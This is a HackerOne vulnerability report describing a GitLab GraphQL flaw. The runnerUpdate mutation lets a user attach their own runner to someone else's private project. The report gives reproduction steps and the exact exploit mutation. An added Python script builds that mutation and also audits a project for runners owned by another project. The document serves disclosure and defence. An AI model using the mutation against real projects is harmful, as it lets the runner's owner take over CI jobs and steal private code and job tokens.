Malicious Runner Attachment via GraphQL
HackerOne report #1969599 by yvvdwf on 2023-05-02, assigned to @rshambhuni:
Report
Hi,
This GraphQL endpoint allows associating a runner with a project without checking whether the current user has permission on that project. It leads to the ability to assign a (malicious) runner to any project. Consequently, this is a possible attack vector for "stealing" runner jobs.
Steps to reproduce
- Prepare: as the victim, create a private project. Note the project ID, e.g., 111111111.
- As the attacker:
  1.1 In an existing project, or a new one, go to Settings > CI/CD > Runners. Follow the steps in "Project runners" to set up a runner for this project.
  1.2 After registering the runner, edit it by unchecking "Lock to current projects", then click "Save changes".
  1.3 Note the ID of the runner, e.g., 999999999.
  1.4 Open https://gitlab.com/-/graphql-explorer and run the following query after replacing the IDs with your runner ID and the victim's project ID:

    mutation {
      runnerUpdate(input: {id: "gid://gitlab/Ci::Runner/999999999",
        associatedProjects: ["gid://gitlab/Project/111111111"]
      }) {
        runner {
          ownerProject { fullPath }
        }
        errors
      }
    }

- As the victim, open the private project and go to Settings > CI/CD > Runners. You should see that the runner is now in the list of "Assigned project runners".
  2.1 Add a .gitlab-ci.yml file to the project, if it does not exist, with the following content:

    build-job:
      script:
        - echo "This script will be run in a malicious runner"

  2.2 Go to CI/CD > Jobs: you should see that the job is executed by the runner above.
Impact
The impact should be similar to CVE-2022-0735 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N, 9.6). That is, an unauthorized user is able to steal runner jobs, which can be used to uncover private information such as project code and CI/CD job tokens.
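Added example, not code from the reporter or from GitLab: it builds the same runnerUpdate mutation as a JSON body for the GraphQL API, parses the reply, and then does the check a project owner would want after reading this report, listing project-type runners assigned to a project whose owning project is somewhere else. The endpoint URL (https://gitlab.com/api/graphql), Bearer-token authentication, the `Project.runners` connection and the `runnerType` / `PROJECT_TYPE` names are assumptions about the GitLab schema; only `runnerUpdate`, `associatedProjects` and `ownerProject` come from the report. The two replies at the bottom are constructed sample data so the script runs offline.

```python
# Added example (not the reporter's or GitLab's code). Builds the runnerUpdate
# mutation from the report, parses its reply, and audits a project's assigned
# runners for ones owned by another project. Network access is isolated in
# post_graphql(); everything else runs offline on constructed sample replies.
import json
import urllib.request
from typing import Optional

GRAPHQL_URL = "https://gitlab.com/api/graphql"  # assumed GitLab GraphQL endpoint


def runner_gid(runner_id: int) -> str:
    """Global ID format for runners, as used in the report's mutation."""
    return f"gid://gitlab/Ci::Runner/{runner_id}"


def project_gid(project_id: int) -> str:
    """Global ID format for projects, as used in the report's mutation."""
    return f"gid://gitlab/Project/{project_id}"


def build_runner_update(runner_id: int, project_ids: list[int]) -> dict:
    """The report's mutation as a JSON body for POST to the GraphQL API."""
    projects = ", ".join(json.dumps(project_gid(p)) for p in project_ids)
    query = (
        "mutation {\n"
        "  runnerUpdate(input: {id: " + json.dumps(runner_gid(runner_id)) + ",\n"
        "    associatedProjects: [" + projects + "]}) {\n"
        "    runner { id ownerProject { fullPath } }\n"
        "    errors\n"
        "  }\n"
        "}"
    )
    return {"query": query}


def parse_runner_update(response: dict) -> tuple[Optional[str], list[str]]:
    """Return (owner project fullPath, errors reported by GitLab) from a reply."""
    payload = (response.get("data") or {}).get("runnerUpdate") or {}
    runner = payload.get("runner") or {}
    owner = (runner.get("ownerProject") or {}).get("fullPath")
    return owner, list(payload.get("errors") or [])


# Defender-side query. `runners` on Project and the `runnerType` enum are
# assumed schema names; `ownerProject { fullPath }` appears in the report.
PROJECT_RUNNERS_QUERY = (
    "query ($path: ID!) { project(fullPath: $path) {"
    " runners { nodes { id runnerType ownerProject { fullPath } } } } }"
)


def foreign_runners(project_path: str, response: dict) -> list[str]:
    """IDs of project-type runners assigned to project_path but owned elsewhere.

    Instance and group runners have no owning project and are skipped; a
    project runner whose owner is not this project is exactly the situation
    the report describes (a runner registered elsewhere, then attached here).
    """
    nodes = response["data"]["project"]["runners"]["nodes"]
    return [
        n["id"] for n in nodes
        if n.get("runnerType") == "PROJECT_TYPE"  # assumed enum value
        and (n.get("ownerProject") or {}).get("fullPath") != project_path
    ]


def post_graphql(body: dict, token: str) -> dict:
    """POST a query body with a personal access token (not called offline)."""
    req = urllib.request.Request(
        GRAPHQL_URL,
        data=json.dumps(body).encode(),
        headers={"Content-Type": "application/json",
                 "Authorization": f"Bearer {token}"},  # assumed auth header
    )
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)


# Constructed sample replies standing in for what gitlab.com would return.
SAMPLE_UPDATE_REPLY = {"data": {"runnerUpdate": {
    "runner": {"id": runner_gid(999999999),
               "ownerProject": {"fullPath": "attacker/runner-host"}},
    "errors": [],
}}}

SAMPLE_RUNNERS_REPLY = {"data": {"project": {"runners": {"nodes": [
    {"id": runner_gid(1), "runnerType": "INSTANCE_TYPE", "ownerProject": None},
    {"id": runner_gid(42), "runnerType": "PROJECT_TYPE",
     "ownerProject": {"fullPath": "victim/private-project"}},
    {"id": runner_gid(999999999), "runnerType": "PROJECT_TYPE",
     "ownerProject": {"fullPath": "attacker/runner-host"}},
]}}}}

if __name__ == "__main__":
    print(build_runner_update(999999999, [111111111])["query"])
    print(parse_runner_update(SAMPLE_UPDATE_REPLY))
    print(foreign_runners("victim/private-project", SAMPLE_RUNNERS_REPLY))
```

To run the audit against a real project, send `{"query": PROJECT_RUNNERS_QUERY, "variables": {"path": "group/project"}}` through `post_graphql()` with a token that can read the project, then pass the reply to `foreign_runners()`; any ID it returns is a runner assigned to the project by someone who registered it under a different project, which on a patched instance should only be possible for users with permission on both.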